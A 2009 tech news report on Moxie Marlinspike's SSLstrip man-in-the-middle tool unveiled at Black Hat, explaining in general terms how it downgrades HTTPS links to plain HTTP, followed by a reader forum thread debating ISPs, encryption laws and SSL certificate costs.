Hacker creates SSLstrip package

Hacker creates SSLstrip package

SSL connections are the cornerstone of ecommerce - but hacker Moxie Marlinspike has a tool for breaking them wide open.

If you think that your connection to websites is secure, new research might give you cause to think otherwise.

According to an article on The Register, hacker Moxie Marlinspike – an alias, obviously – has used this week's Black Hat security conference to unveil a new attack against Secure Socket Layer connections to web sites.

Dubbed “SSLstrip,” the attack is a novel form of man-in-the-middle attack which can be carried out on publicly-accessible WiFi networks, onion-routing networks like Tor, and local area networks that share a single connection point to the Internet. Designed to sit in-between a client and a server, the package tricks the user into believing that a secure connection to a website has been opened – while actually transmitting information including user names, passwords, and credit card details via plain-text.

According to Marlinspike's presentation, the attack works because of measures put in place to speed up web servers: because SSL puts a strain on the server hardware, taking far longer to serve than an unencrypted connection, most websites serve content on an unencrypted link and only switch to SSL encryption when private information is being transmitted in either direction.

By modifying the secure links to point to HTTP – port 80 – rather than HTTPS – port 443 – the SSLstrip tool forces the web browser to transmit information in plain-text format, without encryption. The website, however, labours under the assumption that the connection is still fully encrypted and secure, and so an error message is never generated.

Where the tool gets clever is in the use of a proxy server which is signed with a valid SSL certificate. When this mode is activated, the connection between the web browser and the SSLstrip server is secured with valid credentials – which means that built-in protections in the browser against this sort of man-in-the-middle attack are never triggered, and the user continues to see that oh-so-reassuring padlock symbol and a “https://” address.

The attack – which has been tested against both Firefox and Safari – isn't a mere proof of concept, either: Marlinspike has successfully run the package on a Tor exit node, gathering 254 passwords for supposedly-secure sites including GMail, TicketMaster, and PayPal over the course of a single day.

So far, there is no real solution to the problem of SSL man-in-the-middle attacks – aside from, as Marlinspike himself states, to “encrypt everything” – something that will require webhosts to invest in significantly more powerful hardware.

Does the knowledge that a simple tool for sniffing your SSL-protected details exists give you cause for alarm, or is the likelyhood of someone being in a position to run a man-in-the-middle attack so low that the SSLstrip package is nothing more than an interesting toy? Share your thoughts over in the forums.


Discuss in the forums Reply
n3mo 20th February 2009, 15:10 Quote
Those attacks were tested some time before, very effective indeed. The main problem is that since the beginning ISPs should have invested in full-scale encryption systems. They didn't, because it was "too expensive". Well, now we pay for that.
perplekks45 20th February 2009, 16:50 Quote
We can only wait for the first class action filed in the US against [enter ISP name here] and within just 2-5 years ISPs will sort their hardware problems out...
Redbeaver 20th February 2009, 17:06 Quote
that is indeed a very interesting toy.......
n3mo 20th February 2009, 17:38 Quote
Originally Posted by perplekks45
We can only wait for the first class action filed in the US against [enter ISP name here] and within just 2-5 years ISPs will sort their hardware problems out...

Well, not really. Governments don't like encryption at all - in England even using Putty is illegal. (I know, this is so dumb... it's even hard to phrase how dumb it is, actually)
perplekks45 20th February 2009, 19:13 Quote
Putty is illegal? Great! That reminds me of the German government trying to pass a law making the use of vulnerability scanners illegal. And how exactly would companies be able to find vulnerabilities after that? Testing for them manually? Great idea. :D
boiled_elephant 20th February 2009, 22:49 Quote
I excreted bricks. That is a very, very worrying discovery. Proof positive, thuough, that Black Hat is actually a useful convention - imagine if the first person to discover this had been a genuine crook?
dyzophoria 22nd February 2009, 07:41 Quote
so from what Im understanding, since this is a man in the middle attack, this would only possible with public WIFI hotspots right?
Timmy_the_tortoise 22nd February 2009, 13:58 Quote
They'd better fix this soon.
[USRF]Obiwan 23rd February 2009, 07:33 Quote
To be honest the real let down is that you have to pay so much money for a SSL license. Can hook up one domain or IP address. For a web server hosting multiple sites this is a terrible construction.
Log in

You are not logged in, please login with your forum account below. If you don't already have an account please register to start contributing.

Discuss in the forums